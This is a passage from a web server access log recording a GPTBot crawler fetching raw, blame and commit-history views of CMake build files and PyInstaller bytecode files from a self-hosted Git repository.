74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10177] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21837] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16401] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39744] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39740] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:15:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14295] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14639] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14638] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10935] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14296] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73585] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:15:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24017] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11072] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:15:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:15:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20384] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9963] 